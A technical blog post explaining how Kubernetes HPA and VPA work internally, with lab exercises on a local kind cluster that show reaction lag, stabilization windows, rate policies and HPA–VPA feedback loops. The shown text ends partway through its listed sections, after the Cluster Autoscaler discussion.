DEV Community: Piyush Jajoo

Kubernetes Autoscaling Internals: HPA and VPA Under the Hood

Piyush Jajoo — Fri, 03 Apr 2026 01:30:10 +0000

This post assumes Kubernetes 1.27+ and the autoscaling/v2 API. It targets senior ICs and platform engineers who operate autoscaling systems in production.

Prerequisites: Setting Up Your Lab Cluster
Autoscaling Is a Multi-Loop System
The Problem Space
Horizontal Pod Autoscaler (HPA)
- The Control Loop
- HPA as a Delayed, Saturating P-Controller
- The End-to-End Reaction Time
- The Scaling Algorithm
- Multi-Metric Behavior
- CPU vs. External Metrics: An Explicit Tradeoff
- HPA v2 Scaling Policies
- The CPU Request Coupling Problem
- Metrics Pipeline
- Scale-to-Zero
Vertical Pod Autoscaler (VPA)
- Architecture: Three Separate Components
- The Recommender: Statistical Core
- The Updater: The Disruptive Actor
- The Admission Controller: The Mutation Point
HPA vs VPA: When to Use Which
Cluster Autoscaler Interaction
Operational Gotchas
Autoscaling Failure Taxonomy
Production Incident Pattern: The Black Friday Failure Mode
Choosing an Autoscaling Strategy
Production Design Pattern: A Battle-Tested Reference Architecture
Cost Dynamics of Autoscaling
What Experienced Engineers Actually Do
Common Misconfigurations
- HPA Anti-Patterns
- VPA Anti-Patterns
Observability: Metrics That Matter
Summary

Prerequisites: Setting Up Your Lab Cluster

Before diving in, spin up a local kind cluster with metrics-server pre-configured. All exercises in this guide assume this setup.

# Install kind if you haven't already
brew install kind          # macOS
# or: curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.22.0/kind-linux-amd64 && chmod +x kind && mv kind /usr/local/bin/

# Create a 3-node cluster (1 control-plane + 2 workers)
cat <<EOF | kind create cluster --name autoscaling-lab --config=-
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
- role: worker
EOF

# Install metrics-server (kind doesn't ship it)
kubectl apply -f https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml

# Patch metrics-server to work without TLS verification (required in kind)
kubectl patch deployment metrics-server -n kube-system --type='json' \
  -p='[{"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--kubelet-insecure-tls"}]'

# Wait for metrics-server to be ready
kubectl rollout status deployment/metrics-server -n kube-system --timeout=60s

# Verify it's working (may take ~30s after rollout)
kubectl top nodes

Autoscaling Is a Multi-Loop System

Before diving into HPA and VPA internals, it is worth establishing the full system. Kubernetes autoscaling is not one controller — it is four independent control loops operating on different timescales and different variables:

Loop	What it controls	Timescale
HPA	Replica count	Seconds to minutes
VPA	Per-pod resource requests	Minutes to hours
Cluster Autoscaler	Node count	Minutes
Scheduler	Pod placement	Milliseconds

Most production autoscaling incidents do not occur because a single loop misbehaved. They occur because two loops reacted to the same signal on different timescales — HPA scaling out while VPA evicts, CA provisioning for a transient condition, the scheduler unable to place pods while CA is still bootstrapping. Understanding each loop in isolation is necessary but not sufficient. This post focuses on HPA and VPA, but always with awareness of how they interact with the broader system.

The Problem Space

Autoscaling is not "automatic scaling" — it is approximate control under delayed, noisy signals. It is two independent control systems manipulating different variables with incomplete information and non-zero lag. HPA and VPA operate on fundamentally different axes, use different control models, and interact with each other in ways that will cause production incidents if misunderstood. The goal of this post is to build the internal mental model needed to tune and debug them without flying blind.

🧠 Mental Model: Autoscaling is Approximation

Autoscalers operate on metrics that are sampled, aggregated, and delayed. They apply changes that take tens of seconds to minutes to materialize. Perfect elastic scaling is not achievable — only bounded approximation is. The engineering goal is not to eliminate the gap between supply and demand, but to constrain how large that gap can grow and how long it can persist.

Horizontal Pod Autoscaler (HPA)

The Control Loop

HPA is a classic reconciliation controller running in kube-controller-manager. Every 15 seconds (configurable via --horizontal-pod-autoscaler-sync-period), it wakes up, samples metrics, computes a desired replica count, and patches the target's spec.replicas.

HPA as a Delayed, Saturating P-Controller

HPA is not just a proportional controller — it is a delayed, rate-limited, saturating P-controller operating on a lagging signal. It reacts to the instantaneous ratio between observed and desired metric values with no integral or derivative terms. This framing matters because it predicts failure modes precisely:

No integral term: Steady-state error persists. If your metric target is set too high, HPA will converge to a replica count that satisfies the ratio on paper but still leaves the service under-provisioned relative to actual demand.
No derivative term: HPA cannot anticipate spikes. It has no model of metric velocity or acceleration — only current deviation from target.
High phase lag: The 75–135 second reaction chain means HPA is always responding to load conditions that no longer exist at the moment the new pods are ready.
Hard saturation: minReplicas/maxReplicas and scaling policies create non-linear saturation effects. At saturation boundaries, the proportional response is simply clipped.

This combination makes HPA inherently prone to limit cycles under bursty load: it oscillates between under-provisioned and recovering states because it cannot hold position at steady state under noisy input. Stabilization windows exist as bolt-on hysteresis mechanisms rather than intrinsic damping — they reduce oscillation frequency but do not eliminate the underlying phase lag.

🧠 Mental Model: HPA Buys Time, Not Capacity

HPA does not handle spikes — it reacts after the spike has already started. Your system must survive the first 75–135 seconds without any additional pods. Conservative CPU targets (50–65%), generous minReplicas, and pre-warmed capacity buffers are not timidity — they are the engineering response to a controller with 90+ second phase lag.

The End-to-End Reaction Time

A critical mental model that most teams lack is a quantified timing chain. When traffic spikes, the time before new pods are actually serving requests is approximately:

Total Reaction Time ≈
  metric scrape interval    (~15s  for metrics-server)
+ metrics aggregation lag   (~15s)
+ HPA sync period           (~15s)
+ pod startup time          (20–60s depending on image and init)
+ readiness probe delay     (10–30s)
─────────────────────────────────────
Realistic range:             75 – 135 seconds

This means that under a sharp traffic spike, your service absorbs load for over a minute before a single additional pod is ready. Setting CPU targets at 80–90% leaves no headroom for that window. Conservative targets (50–65%) exist precisely to buy time for this pipeline to execute.

🧪 Exercise 1: Observe the HPA Reaction Time Pipeline

Deploy a simple CPU-bound workload and watch the timing chain in action.

Step 1: Deploy the target workload
kubectl create deployment php-apache \
  --image=registry.k8s.io/hpa-example \
  --port=80

kubectl set resources deployment php-apache \
  --requests=cpu=200m,memory=64Mi \
  --limits=cpu=500m,memory=128Mi

kubectl expose deployment php-apache --port=80 --name=php-apache
Step 2: Create an HPA targeting 50% CPU
kubectl autoscale deployment php-apache \
  --cpu-percent=50 \
  --min=1 --max=10

# Watch the HPA state in one terminal
kubectl get hpa php-apache --watch
Step 3: Generate load and timestamp the spike
# In a second terminal: record the exact time and start load
echo "Load started at: $(date +%T)"
kubectl run -i --tty load-generator --rm \
  --image=busybox:1.28 --restart=Never -- \
  /bin/sh -c "while sleep 0.01; do wget -q -O- http://php-apache; done"
Step 4: Measure the delay
# In a third terminal, poll and timestamp HPA events
kubectl get events --field-selector involvedObject.name=php-apache \
  --sort-by='.lastTimestamp' --watch
What to observe: Note the timestamp when you started the load vs. when the first SuccessfulRescale event appears. You should see roughly 45–90 seconds of lag. Compare the gap against the timing chain formula above.

Expected signal shape if you were graphing this:

CPU utilization: sharp spike within 15s of load start

Replica count: flat for 45–90s, then a step increase

Phase lag between CPU spike and replica step is the controller's entire reaction pipeline made visible

After scaling, CPU drops as load spreads across new pods — but there is typically a secondary spike as readiness probes pass and traffic routing catches up

Stop the load: Ctrl+C in the load-generator terminal. The pod will self-delete (it was --rm).

The Scaling Algorithm

The core formula:

desiredReplicas = ceil[currentReplicas × (currentMetricValue / desiredMetricValue)]

Several stabilizing mechanisms layer on top:

Stabilization windows prevent oscillation. Because HPA lacks intrinsic damping, stabilization windows act as an external hysteresis mechanism. The controller maintains a rolling window of past recommendations. For scale-down, it selects the maximum recommendation seen during the window (default: 300s), preventing premature scale-in. For scale-up, it selects the minimum recommendation (default: 0s — acts immediately). This asymmetry is intentional: be aggressive about adding capacity, conservative about removing it. CA mirrors this philosophy at the node level — its scale-down is even more conservative, with a default 10-minute idle delay before a node is considered for removal. Both loops are deliberately slow to release capacity.

Tolerance (default 0.1 = 10%) means HPA won't act if currentValue is within 10% of targetValue, preventing constant micro-adjustments under noisy metrics.

Missing pod handling: For pods that have no metrics (not yet Running, or mid-startup), HPA applies a conservative heuristic. During scale-up, it assumes those pods are consuming 100% of target utilization to avoid under-scaling. During scale-down, it assumes they are at target-level utilization to avoid premature scale-in. They are not assumed to be idle.

🧪 Exercise 2: Verify the Stabilization Window During Scale-Down

This exercise makes the 300-second scale-down stabilization window visible. You'll drive scale-up, stop the load, and watch HPA refuse to scale down immediately.

Setup (continuing from Exercise 1, or re-run setup):
# Ensure php-apache HPA exists with default behavior
kubectl get hpa php-apache
Generate load until HPA scales out to 3+ replicas:
kubectl run -i --tty load-generator --rm \
  --image=busybox:1.28 --restart=Never -- \
  /bin/sh -c "while sleep 0.01; do wget -q -O- http://php-apache; done"

# Wait until replicas >= 3
kubectl get hpa php-apache --watch
Stop load and record the time:
# Ctrl+C in load-generator terminal, then:
echo "Load stopped at: $(date +%T)"
kubectl get hpa php-apache --watch
What to observe: After load stops, CPU will drop immediately, but HPA will hold replica count for ~5 minutes before scaling down. This is the 300-second scaleDown stabilization window in action.

Shortcut the wait — override the stabilization window:
kubectl patch hpa php-apache --type='merge' -p='
spec:
  behavior:
    scaleDown:
      stabilizationWindowSeconds: 30
      policies:
      - type: Percent
        value: 100
        periodSeconds: 30'

# Now watch scale-down happen much faster
kubectl get hpa php-apache --watch
Key insight: The default 300s window exists to prevent flapping. Override it with care — a too-aggressive scale-down policy can cause oscillation under bursty traffic.

Multi-Metric Behavior

computeReplicasForMetrics in pkg/controller/podautoscaler/ iterates over all configured metrics and takes the maximum desired replica count — metrics are not averaged. Consider a service configured with both CPU and RPS targets:

Metric	Current	Target	Desired Replicas
CPU	70%	50%	6
RPS	800	400	10

HPA sets replicas = 10, driven by RPS. This is mathematically correct but operationally dangerous when one metric is noisy or misconfigured — a spurious spike in any single metric drives the entire replica count up. Monitor individual metric recommendations, not just the resulting replica count.

CPU vs. External Metrics: An Explicit Tradeoff

The choice of HPA signal is one of the highest-leverage tuning decisions you make. Most teams default to CPU because it requires no additional pipeline — but that convenience has a cost:

Dimension	CPU	RPS / Queue Depth
Signal freshness	❌ Lagging (scrape + aggregation + sync = 45s+)	✅ Near-real-time
Infra independence	✅ Always available	❌ Requires metrics pipeline (Prometheus Adapter, KEDA)
VPA coupling risk	❌ High — VPA changes requests, distorts utilization ratio	✅ None — orthogonal signal
Throttling blind spot	❌ Throttled CPUs appear underloaded	✅ Not affected
Stability	✅ High — noisy workloads still converge	⚠️ Lower — noisy metrics drive unnecessary scale events
Failure mode	Under-scaling (HPA reacts too late)	Over-scaling (transient metric spikes)

CPU is safer to configure but slower to react and couples badly with VPA. RPS is faster and decoupled, but requires a functioning metrics pipeline and careful target setting. Production systems often blend both — RPS as the primary signal with a CPU ceiling to catch cases where the metrics pipeline has a gap.

🧠 Mental Model: VPA is a Batch System Disguised as Real-Time

VPA reacts on a timescale of minutes to hours, applies changes via pod restarts, and builds recommendations from historical data. Treat it as an offline optimizer that runs continuously in the background — not a real-time controller. Its job is to right-size pods between load cycles, not to respond to them.

HPA v2 Scaling Policies

A commonly overlooked feature of autoscaling/v2 is scaling rate policies. These cap how fast replica counts can change, and in practice they are more important than stabilization windows for protecting downstream systems from traffic amplification during burst scale-out:

behavior:
  scaleUp:
    policies:
    - type: Percent
      value: 100        # at most double replicas per period
      periodSeconds: 60
    - type: Pods
      value: 4          # or add at most 4 pods per period
      periodSeconds: 60
    selectPolicy: Min   # use whichever is more conservative
  scaleDown:
    policies:
    - type: Percent
      value: 10
      periodSeconds: 120

Without explicit policies, a sudden load spike can cause HPA to jump from 3 to 50 replicas in a single sync cycle. Rate-limiting scale-out smooths the curve and gives downstream dependencies time to adapt.

🧪 Exercise 3: Observe Unconstrained vs. Rate-Limited Scale-Out

This exercise demonstrates why scaling rate policies matter. You'll compare the replica jump with and without a Pods rate cap.

Step 1: Deploy a fresh workload with low CPU requests (makes it easy to saturate)

kubectl create deployment rate-test \
  --image=registry.k8s.io/hpa-example --port=80
kubectl set resources deployment rate-test \
  --requests=cpu=50m --limits=cpu=100m
kubectl expose deployment rate-test --port=80
kubectl scale deployment rate-test --replicas=2

Step 2: Create an HPA without rate policies

cat <<EOF | kubectl apply -f -
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: rate-test
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: rate-test
  minReplicas: 2
  maxReplicas: 20
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 30
EOF

Step 3: Blast it with load and watch the replica jump

# Run 5 parallel load generators
for i in {1..5}; do
  kubectl run load-$i --image=busybox:1.28 --restart=Never -- \
    /bin/sh -c "while true; do wget -q -O- http://rate-test; done" &
done

# Watch replicas — note the size of the jump
kubectl get hpa rate-test --watch

Step 4: Kill load, reset, and add a rate policy

kubectl delete pod -l run=load-1 -l run=load-2 -l run=load-3 -l run=load-4 -l run=load-5 2>/dev/null || true
for i in {1..5}; do kubectl delete pod load-$i --ignore-not-found; done
kubectl scale deployment rate-test --replicas=2

# Now patch the HPA with a rate cap
kubectl patch hpa rate-test --type='merge' -p='
spec:
  behavior:
    scaleUp:
      policies:
      - type: Pods
        value: 2
        periodSeconds: 30
      selectPolicy: Min'

# Re-run the same load burst
for i in {1..5}; do
  kubectl run load-$i --image=busybox:1.28 --restart=Never -- \
    /bin/sh -c "while true; do wget -q -O- http://rate-test; done" &
done

kubectl get hpa rate-test --watch

What to observe: With no policy, replicas may jump 2→10+ in a single cycle. With the 2-pods-per-30s cap, the scale-out is gradual. Neither is always "better" — this illustrates the tradeoff between responsiveness and stability.

Cleanup:

for i in {1..5}; do kubectl delete pod load-$i --ignore-not-found; done
kubectl delete deployment rate-test
kubectl delete hpa rate-test
kubectl delete svc rate-test

The CPU Request Coupling Problem (Why VPA Breaks CPU HPA)

This is the most architecturally significant HPA pitfall that teams consistently miss. CPU utilization in HPA is computed relative to the pod's requested CPU, not actual node capacity:

cpuUtilization = currentCPUUsage / requestedCPU

This creates direct coupling between resource requests and scaling behavior. If you over-request CPU (e.g., requests: 2000m for a service that realistically uses 400m), computed utilization is suppressed — HPA sees a low percentage and refuses to scale out even under genuine load. Conversely, under-requesting CPU inflates utilization and causes premature scale-out.

This is why VPA and HPA must be used together carefully: VPA continuously adjusts requests, which directly shifts HPA's utilization baseline. Run them on separate metrics or you get a feedback loop.

🧪 Exercise 4: Demonstrate CPU Request Coupling

This exercise shows how the same real CPU usage produces different HPA behavior depending on the resource request value.

Step 1: Deploy with a very high CPU request (simulates over-provisioning)

kubectl create deployment coupling-test \
  --image=registry.k8s.io/hpa-example --port=80

# Set a deliberately inflated CPU request
kubectl set resources deployment coupling-test \
  --requests=cpu=1000m --limits=cpu=2000m

kubectl expose deployment coupling-test --port=80

cat <<EOF | kubectl apply -f -
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: coupling-test
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: coupling-test
  minReplicas: 1
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 50
EOF

Step 2: Generate load and observe the HPA metric value

kubectl run load-test --image=busybox:1.28 --restart=Never -- \
  /bin/sh -c "while true; do wget -q -O- http://coupling-test; done"

# Watch — the CPU utilization % will be much lower than real usage
# because it's divided by the 1000m request
kubectl get hpa coupling-test --watch
# In another terminal:
kubectl top pods -l app=coupling-test

Step 3: Reset with a realistic request and observe the difference

kubectl delete pod load-test --ignore-not-found
kubectl scale deployment coupling-test --replicas=1

# Now set a realistic (low) CPU request
kubectl set resources deployment coupling-test \
  --requests=cpu=100m --limits=cpu=500m

# Force pod restart to pick up new requests
kubectl rollout restart deployment coupling-test

# Re-run load
kubectl run load-test --image=busybox:1.28 --restart=Never -- \
  /bin/sh -c "while true; do wget -q -O- http://coupling-test; done"

kubectl get hpa coupling-test --watch
kubectl top pods -l app=coupling-test

What to observe: The same real CPU usage produces a dramatically different utilization percentage depending on the request. With 1000m request, HPA may show 15-20% and not scale. With 100m request, the same workload shows 150-200%+ and triggers aggressive scale-out. This is exactly the feedback loop that emerges when VPA adjusts requests while CPU-based HPA is running.

Cleanup:

kubectl delete pod load-test --ignore-not-found
kubectl delete deployment coupling-test
kubectl delete hpa coupling-test
kubectl delete svc coupling-test

Metrics Pipeline

HPA talks to one of three metrics APIs:

metrics.k8s.io — Resource metrics (CPU/memory) served by metrics-server, which scrapes kubelet's Summary API at ~15s resolution. End-to-end metric freshness (scrape + aggregation + HPA sync cycle) still introduces meaningful lag of 30–60s under normal conditions.
custom.metrics.k8s.io — Arbitrary per-object metrics. Backed by adapters like Prometheus Adapter or Datadog Cluster Agent.
external.metrics.k8s.io — Metrics external to the cluster (queue depths, SQS, etc).

The latency consequence: CPU-based HPA reacts to load that has already materialized. For latency-sensitive services, augment with external or custom metrics that reflect current load (active connections, queue depth, RPS) rather than CPU, which lags by the full pipeline round-trip.

Scale-to-Zero

minReplicas defaults to 1 but can be set to 0 in autoscaling/v2. However, CPU-based scaling cannot recover from zero — there are no pods to report metrics. Scale-to-zero is only viable with external or object metrics, where the metric source exists independently of pod count. In practice, KEDA is the standard solution, as it manages the activator component needed to bridge the zero-to-one cold-start gap.

Vertical Pod Autoscaler (VPA)

Architecture: Three Separate Components

Unlike HPA (a single controller loop), VPA is split into three distinct processes with distinct responsibilities and failure modes:

🧪 Exercise 5: Install VPA and Observe Recommendations

Install the VPA components and run it in Off mode first — as a pure recommendation engine, with no evictions. This is the safest first step for any production environment.

Step 1: Install VPA from the official repo
git clone https://github.com/kubernetes/autoscaler.git /tmp/autoscaler
cd /tmp/autoscaler/vertical-pod-autoscaler

# Install CRDs and components
./hack/vpa-up.sh

# Verify all 3 components are running
kubectl get pods -n kube-system | grep vpa
# Expect: vpa-admission-controller, vpa-recommender, vpa-updater
Step 2: Deploy a workload to monitor
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: hamster
spec:
  replicas: 2
  selector:
    matchLabels:
      app: hamster
  template:
    metadata:
      labels:
        app: hamster
    spec:
      containers:
      - name: hamster
        image: registry.k8s.io/ubuntu-slim:0.14
        resources:
          requests:
            cpu: 100m
            memory: 50Mi
        command: ["/bin/sh"]
        args:
        - "-c"
        - "while true; do timeout 0.5s yes >/dev/null; sleep 0.5s; done"
EOF
Step 3: Create a VPA in Off mode (recommendation only)
cat <<EOF | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: hamster-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: hamster
  updatePolicy:
    updateMode: "Off"
  resourcePolicy:
    containerPolicies:
    - containerName: hamster
      minAllowed:
        cpu: 50m
        memory: 50Mi
      maxAllowed:
        cpu: 2
        memory: 1Gi
EOF
Step 4: Wait ~5 minutes for recommendations to populate, then inspect
# Poll until recommendations appear
kubectl get vpa hamster-vpa --watch

# When RECOMMENDED shows values, describe for full detail
kubectl describe vpa hamster-vpa
What to observe: The status.recommendation.containerRecommendations section shows lowerBound, target, and upperBound for both CPU and memory. Compare these against your manifest's requests. The gap is your rightsizing debt.

Key things to note:

The memory recommendation is likely much higher than 50Mi (processes have real overhead)

The CPU recommendation may differ significantly from 100m

These are updated continuously as the workload runs

The Recommender: Statistical Core

The Recommender maintains an in-memory histogram of CPU and memory usage per container, modeled as a decay-weighted percentile estimator. Older samples are down-weighted exponentially, giving more influence to recent behavior while retaining long-tail signal.

The histogram uses exponential bucket boundaries — each bucket is ~10% wider than the previous, enabling compact representation across orders of magnitude of resource values.

Two important asymmetries in how CPU and memory are modeled:

Memory uses peak samples, not averages. Since memory is not compressible (a process that allocates 2GB cannot be throttled down to 1GB without an OOMKill), the Recommender intentionally biases toward observed peaks rather than typical usage. This makes memory recommendations more conservative than CPU by design.

CPU recommendations smooth over bursts. CPU is compressible — throttling slows a process but doesn't kill it. The recommender uses a smoother model for CPU, accepting that brief spikes will be throttled rather than sizing for them. However, this creates a blind spot: if CPU limits are enforced aggressively, throttling suppresses the observed usage signal, making VPA's histogram reflect artificially low CPU consumption. The Recommender cannot distinguish "this container uses 200m" from "this container is throttled at 200m." If you see VPA recommending low CPU while your application has high p99 latency, check container_cpu_throttled_seconds_total before trusting the recommendation.

Key estimation parameters:

Target percentile: CPU recommended at p90 of observed usage; memory at p95. Both are configurable.
Safety margin: +15% added on top of the percentile estimate (configurable via --recommendation-margin-fraction).
Confidence: For containers with sparse samples, confidence intervals widen and recommendations inflate conservatively.

Critically, the Recommender produces three values written to VPA.status.recommendation:

The Updater only evicts a pod if its current requests fall outside the [lowerBound, upperBound] range — not every time the target shifts. This prevents constant churn under normal variance.

The Updater: The Disruptive Actor

The Updater runs every 1 minute. If a pod's current requests are outside the recommended bounds, the Updater evicts it. The pod is recreated by its owning controller, and the Admission Webhook intercepts that new pod creation to inject the updated requests.

Two important constraints on Updater behavior:

PodDisruptionBudgets are respected. If a PDB is too strict, or the workload is running at minimum replicas, VPA will refuse to evict and silently do nothing. Teams often discover this when VPA appears "stuck" — recommendations update in .status but pods never change. Check PDB disruptions allowed if VPA seems inert.

It requires pod restarts. In-Place Pod Vertical Scaling (KEP-1287) is beta in recent Kubernetes releases but requires feature gates and has provider-specific support constraints. Do not assume it is available without verifying your cluster version and managed Kubernetes provider.

For stateful workloads, control eviction behavior explicitly:

updatePolicy:
  updateMode: "Off"        # Recommendations only — never evict
  # updateMode: "Initial"  # Inject on creation, never evict running pods
  # updateMode: "Auto"     # Full lifecycle management (default)

Starting with Off and using VPA as a recommendation engine is the safest posture for stateful workloads. Apply recommendations via a GitOps pipeline or scheduled maintenance window.

🧪 Exercise 6: Observe VPA Auto Mode and the PDB Blocker

This exercise demonstrates VPA's Auto mode evicting pods, then shows how a PDB silently blocks it.

Part A: Enable Auto mode and watch the eviction
# Switch hamster VPA to Auto mode
kubectl patch vpa hamster-vpa --type='merge' -p='
spec:
  updatePolicy:
    updateMode: "Auto"'

# Watch for evictions — VPA will evict pods whose requests differ from recommendation
kubectl get pods -l app=hamster --watch &
kubectl get events --field-selector reason=EvictedByVPA --watch &

# After eviction, check the new pod's actual resource requests
# (these are injected by the VPA Admission Controller)
kubectl get pod -l app=hamster -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[0].resources}{"\n"}{end}'
What to observe: The new pods will have different requests than what's in the Deployment spec. The VPA Admission Controller mutated them at pod creation time. Run kubectl get deployment hamster -o yaml | grep -A5 resources — the Deployment spec is unchanged. This is the "advisory manifest" behavior described in the Admission Controller section.

Part B: Create a PDB that blocks eviction
# First, scale down to 1 replica to make the PDB bite
kubectl scale deployment hamster --replicas=1

# Create a PDB requiring minAvailable=1
cat <<EOF | kubectl apply -f -
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
  name: hamster-pdb
spec:
  minAvailable: 1
  selector:
    matchLabels:
      app: hamster
EOF

# Force VPA to want to evict by temporarily setting a request far outside bounds
kubectl patch deployment hamster --type='json' \
  -p='[{"op":"replace","path":"/spec/template/spec/containers/0/resources/requests/cpu","value":"999m"}]'

# Wait a couple minutes, then check — VPA recommendations will show divergence
# but no eviction will occur
kubectl describe vpa hamster-vpa | grep -A20 "Conditions:"
kubectl describe pdb hamster-pdb
What to observe: The VPA status will show the recommendation is out of bounds, but the pod is not evicted. The PDB shows Disruptions Allowed: 0. This is the "VPA appears stuck" scenario described in the Updater section.

Cleanup:
kubectl delete pdb hamster-pdb
kubectl scale deployment hamster --replicas=2
kubectl patch vpa hamster-vpa --type='merge' -p='{"spec":{"updatePolicy":{"updateMode":"Off"}}}'

The Admission Controller: The Mutation Point

When a pod creation request reaches the API server, the VPA Admission Controller (MutatingWebhookConfiguration) intercepts it, looks up the VPA object for the pod's owner, and overwrites resources.requests in the pod spec before it is persisted.

Your Deployment YAML's resource requests become advisory at runtime — VPA owns the actual values. This is intentional but can surprise teams who expect kubectl get pod -o yaml to match their manifests.

🧪 Exercise 7: Confirm the Admission Webhook Mutation

This is a quick but important exercise to internalize that VPA mutates pods at creation time, making manifests advisory.

Step 1: Inspect the MutatingWebhookConfiguration
kubectl get mutatingwebhookconfigurations | grep vpa
kubectl describe mutatingwebhookconfiguration vpa-webhook-config | grep -A10 "Rules:"
Step 2: Check the current VPA mode

Before restarting pods, confirm which update mode VPA is in:
kubectl get vpa hamster-vpa -o jsonpath='{.spec.updatePolicy.updateMode}'
⚠️ If the mode is Off, the Admission Webhook will not mutate pod requests — the pod spec will match the Deployment manifest exactly. This is expected. You must switch to Initial (Step 3) to observe the mutation.

Step 3: Switch to Initial mode to enable webhook mutation

Initial mode instructs VPA to inject recommendations at pod creation time, but never evict running pods. This is the safest mode to observe mutation without disruption:
kubectl patch vpa hamster-vpa --type='merge' \
  -p='{"spec":{"updatePolicy":{"updateMode":"Initial"}}}'

# Confirm the mode change took effect
kubectl get vpa hamster-vpa -o jsonpath='{.spec.updatePolicy.updateMode}'
Step 4: Restart pods and compare requests
# Trigger a rollout so new pods are created (and mutated by the webhook)
kubectl rollout restart deployment hamster
kubectl rollout status deployment hamster

# Compare Deployment spec requests vs. actual pod requests
echo "=== Deployment spec requests ==="
kubectl get deployment hamster \
  -o jsonpath='{.spec.template.spec.containers[0].resources}' | python3 -m json.tool

echo "=== Actual pod requests (post-mutation) ==="
kubectl get pods -l app=hamster \
  -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{.spec.containers[0].resources}{"\n\n"}{end}'
What to observe: The pod's actual CPU and memory requests should now differ from the Deployment manifest — they reflect VPA's recommendation values injected by the Admission Webhook at pod creation time. The Deployment spec itself is unchanged; VPA only mutates the live pod spec.

💡 If requests still match after switching to Initial mode, VPA may not have built up enough sample history yet to generate a recommendation. Wait 2–3 minutes and check: kubectl describe vpa hamster-vpa | grep -A10 "Recommendation:". If the Recommendation section is empty, give the workload more time to run before restarting.

Step 5: Reset VPA mode
# Return to Off mode so later exercises start from a known state
kubectl patch vpa hamster-vpa --type='merge' \
  -p='{"spec":{"updatePolicy":{"updateMode":"Off"}}}'

HPA vs VPA: When to Use Which

The safe combination rule: Never run HPA and VPA on the same metric. If HPA is managing CPU utilization while VPA is adjusting CPU requests, they form a destabilizing positive feedback loop:

VPA increases CPU requests
Same real CPU usage is now a smaller fraction of the larger request — HPA utilization drops
HPA scales in (fewer replicas)
Load concentrates on remaining pods — per-pod CPU rises
VPA observes higher per-pod usage, increases requests further
Repeat

This loop does not converge. It oscillates with each VPA eviction cycle acting as a perturbation that resets the HPA signal. The safe pattern is HPA on external/custom metrics (RPS, queue depth, active connections) with VPA managing CPU/memory requests. Operating on orthogonal signals, the two controllers cannot interfere with each other's feedback paths.

🧪 Exercise 8: Reproduce the HPA + VPA Feedback Loop

This is the most important exercise in the guide. You will deliberately create the feedback loop described above and observe it destabilize replica count.

Step 1: Deploy a workload with both CPU-based HPA and VPA in Auto mode
kubectl create deployment feedback-test \
  --image=registry.k8s.io/hpa-example --port=80
kubectl set resources deployment feedback-test \
  --requests=cpu=200m --limits=cpu=500m
kubectl expose deployment feedback-test --port=80

# CPU-based HPA
kubectl autoscale deployment feedback-test \
  --cpu-percent=50 --min=1 --max=8

# VPA in Auto mode on the same workload
cat <<EOF | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: feedback-test-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: feedback-test
  updatePolicy:
    updateMode: "Auto"
  resourcePolicy:
    containerPolicies:
    - containerName: feedback-test
      minAllowed:
        cpu: 50m
      maxAllowed:
        cpu: 2
EOF
Step 2: Apply moderate, sustained load
kubectl run feedback-load --image=busybox:1.28 --restart=Never -- \
  /bin/sh -c "while true; do wget -q -O- http://feedback-test; sleep 0.1; done"

# Monitor replica count and CPU utilization over 10+ minutes
watch -n5 "kubectl get hpa feedback-test && echo '---' && kubectl get vpa feedback-test-vpa && echo '---' && kubectl top pods -l app=feedback-test"
What to observe: VPA will adjust CPU requests upward. Each time it does, the same real CPU usage becomes a smaller percentage of the new (larger) request. HPA sees lower utilization and scales in. Fewer pods means more load per pod. VPA observes higher per-pod CPU and adjusts requests further. Watch for oscillation in replica count.

Step 3: Fix it — switch HPA to a non-CPU metric

In a real cluster you'd use RPS from Prometheus. In kind, use a ContainerResource metric on memory instead (orthogonal to CPU), or simply document that the fix is to replace CPU-based HPA with an external/custom metric.
# The correct fix: delete the CPU-based HPA, use a different signal
kubectl delete hpa feedback-test

# In production, replace with:
# - An ingress RPS metric via Prometheus Adapter
# - A queue depth metric via KEDA
# - An active connections metric from your load balancer
Cleanup:
kubectl delete pod feedback-load --ignore-not-found
kubectl delete deployment feedback-test
kubectl delete hpa feedback-test --ignore-not-found
kubectl delete vpa feedback-test-vpa
kubectl delete svc feedback-test

Cluster Autoscaler Interaction

HPA and VPA both create pressure on the node pool, but on different timescales and through different mechanisms.

HPA is fast. CA is slow. Node bootstrap time is the dominant constant in the system — every autoscaling strategy is bounded by it. The 2–4 minute bootstrap lag (longer for GPU or large instance types) sets a hard floor on how quickly new capacity can serve traffic. Any strategy that relies on CA to absorb spikes has accepted this floor as a design constraint.

CA solves local schedulability, not global efficiency. CA provisions enough nodes to schedule the pods that are currently Pending. It does not optimize bin-packing across the cluster — it does not rebalance existing pods, consolidate fragmented nodes, or optimize for cost. This is why VPA can increase node count even when actual CPU utilization is low: the scheduler makes placement decisions based on requests, not observed usage. VPA inflates requests → pods no longer fit on existing nodes → CA provisions new nodes → actual utilization stays flat or even falls. The cluster grows without the workload growing.

VPA raises the node pressure threshold — and can increase your bill. VPA increases requests, not limits. Larger requests make pods harder to schedule on existing nodes, pushing CA to provision additional capacity or larger instance types. This silently changes your node pool's instance shape economics. You may end up with fewer, larger nodes than intended — or more total nodes — without any increase in actual cluster utilization. Monitor instance type distribution and node count trends after enabling VPA in Auto mode; the cost impact will appear there before it shows up in billing reports.

